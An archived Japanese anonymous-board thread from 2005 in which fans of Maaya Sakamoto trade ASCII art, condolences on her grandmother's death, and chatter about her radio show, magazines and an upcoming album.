428 :声の出演:名無しさん:2005/06/01(水) 00:51:00 ID:NUPF2FD/0
                  __,,,,.、、、 --──- .,_
               /;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:`''ヽ、
              /;:;:;:;:;:;:;:;:;:;:;:;:;:,.,.,.,.,._;:;:;:;:;:;:;:;:;:;:;:;:\
            / {;:;:;:;:;:;:;:;:;:,./    `ヽ、;:;:;:;:;:;:;:;:;:;:ヽ
            l;:;:;:/ ヽ-- ''"        ゙、;:;:;:;:;:;:;:;:;:;:;:;:゙、
            ノ;:./    i '´ ___,. -─‐-、 <;:;:;:;:;:;:;:;:;:;:;:;:;:l
           (;:;:;:l _,,,,,,.___ l  r',,. ─ ,.‐‐-ゝ!;:;:;:;:;:;:;:;:;:;:;:;:;:i   うふ♪
            ゙i レ .,─oヽ  丶ー‐''"″ r';:;:;:;:i´⌒ヽ;:;:;:;:{
            ヽi 、`ー''"l  i ゙i ///// };:;:;:;:゙i-,  l;:;:;:;:.)
        __r‐-ァ lヽ,////   __     /|;:;:;:;:;:;:}'  l;:;:;:;:/
    r'" ̄  |  /  { |`  〈.,,___ ,.-<,._  ' `ニ7,._ノ  /;:;:;:;:'-,
    i    ヽ、!  〈,l ,r'´       ゙ヽ、   ̄    ;:;:;:;:│
     ヽ、 `ー-ゝ─〈| L,,. ヘ二二ソ─--- .,ゝ     ノ;:;:;:;:;:;:│  ラルだっちゃ!
      \   \_,; ゙、   ---            /;:;:;:;:;:;:;:/
        `'-、,_   `'ヽ、,        _,,. -'-、_;:;:;:;:;:;:;:丿
           `'‐、_   ヽ、____ ,.-'"  `ヽ ヾ,;:;:丿
           _ノ';:`ヽ,_   ; ヾ、_ '     ヽ,  `''‐、,_
            /;:;:;:;:;:;:;:`>'"´    `      `'    ヽ,
           !;:;:i!;:;:;:;:r'"~ヾ、  ,;               ヽ
           ヽj !;:;:;:;:{'';:;'':;:;,ゝ、 レー'" ̄'-‐、、 、     ヽ
             ヽ,;:;:;:ゞ、ミ;:,_シ'ヾ;:;'':;,,;:;:'';:;:;:;:''ヾ、_i\      ヽ
              `ー'ー| ̄   `'ー=、;、=-'" ̄'y'  ヽ     ヽ
                   |              /   ヽ    ヽ

429 :声の出演:名無しさん:2005/06/01(水) 00:52:05 ID:b6DUce8c0
ビタミンMは親不知を抜いた話。
あとは普通のお便り「フツオタ」。
海外からのメールに感動したゾ!!

430 :声の出演:名無しさん:2005/06/01(水) 01:08:00 ID:2RZTLgg+0
お祖母さんが亡くなったんだね。ご冥福を祈る。

431 :声の出演:名無しさん:2005/06/01(水) 01:20:01 ID:b6DUce8c0
>>430
HPのI.Dを参照。
お悔やみ申し上げます。

432 :声の出演:名無しさん:2005/06/01(水) 01:29:31 ID:aFyJBFl70
I.D見た。
真綾タン、がんがっていい仕事してくれ!

433 :声の出演:名無しさん:2005/06/01(水) 02:04:28 ID:+jbFQXla0
俺のばあちゃんと一日違いだ

434 :声の出演:名無しさん:2005/06/01(水) 04:43:41 ID:ELV5HmDp0
20代前半で祖父祖母世代が亡くなりはじめて、葬祭のやり方を学習するきっかけになって、
それが就職してからの付き合いの役に立つ。不思議とよくできてる仕組みだと思う。

435 :声の出演:名無しさん:2005/06/01(水) 07:22:34 ID:1n0MBx8vO
>>409
一日経ってもレスが無い…
ここアンチスレじゃないよな?(hm3は他とカブって無いらしいから、hm3と他に何か一冊を買えば良いの?)
>>434
俺は父方は10歳に成る前に二人とも亡くなったからあまり詳しく覚えてないなぁ…母方のお婆ちゃんは中二だったから覚えてるけど宗派が違ったからやり方が結構違ったな。

436 :声の出演:名無しさん:2005/06/01(水) 07:29:36 ID:ogBCijhh0
>>435
かまってちゃんは消えろ

437 :声の出演:名無しさん:2005/06/01(水) 07:48:16 ID:W2nMvqX00
俺みたいな歌が好きなだけの人は雑誌なんか見ないしな

438 :声の出演:名無しさん:2005/06/01(水) 08:22:44 ID:mtpk21UFO
残念ながら俺もまだ雑誌をチェックしてないので答えようがない

439 :声の出演:名無しさん:2005/06/01(水) 11:59:08 ID:xkuGCLMx0
同じ真綾好きでもここにはただの音楽好きと真綾の活動とか全てが好きな人
両方のタイプが共存しているからなぁ

440 :声の出演:名無しさん:2005/06/01(水) 12:37:20 ID:eKtMm0kJ0
>>435
「H」っていう雑誌がお勧め
音楽コーナーに置いてあるよ

441 :声の出演:名無しさん:2005/06/01(水) 13:15:23 ID:L7zoWK+30
声優としてのサカモトマーヤは消えました

442 :声の出演:名無しさん:2005/06/01(水) 13:41:44 ID:cHnYzUrx0
洋画吹替えとしてのマーヤサカモトが現れました

443 :声の出演:名無しさん:2005/06/01(水) 15:32:42 ID:UvbC0tk60
今まで真綾のCDレンタルはアルバムだけだった近所の店にループ入ってた
地味にすごい事だ

444 :声の出演:名無しさん:2005/06/01(水) 16:27:04 ID:TXWk+sIG0
444(σ・∀・)σゲッツ!!

445 :声の出演:名無しさん:2005/06/01(水) 18:00:46 ID:VGrUd1DP0
今アルバムつくってますときたか。
菅野よう子ぬきでかな。

446 :声の出演:名無しさん:2005/06/01(水) 18:30:35 ID:Drn12wCW0
誰かアメリカの行く人いる?

447 :声の出演:名無しさん:2005/06/01(水) 18:43:45 ID:83WSZ7wm0
>>445
そうだよ

448 :声の出演:名無しさん:2005/06/01(水) 18:53:09 ID:Sy7+M0d9O
真綾ファンだがあんまりくわしくないので聞きます。
イジリも菅野さんぬきで良いんでしたっけ?
私はバーズとかめちゃめちゃ好きなんですが。

95 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)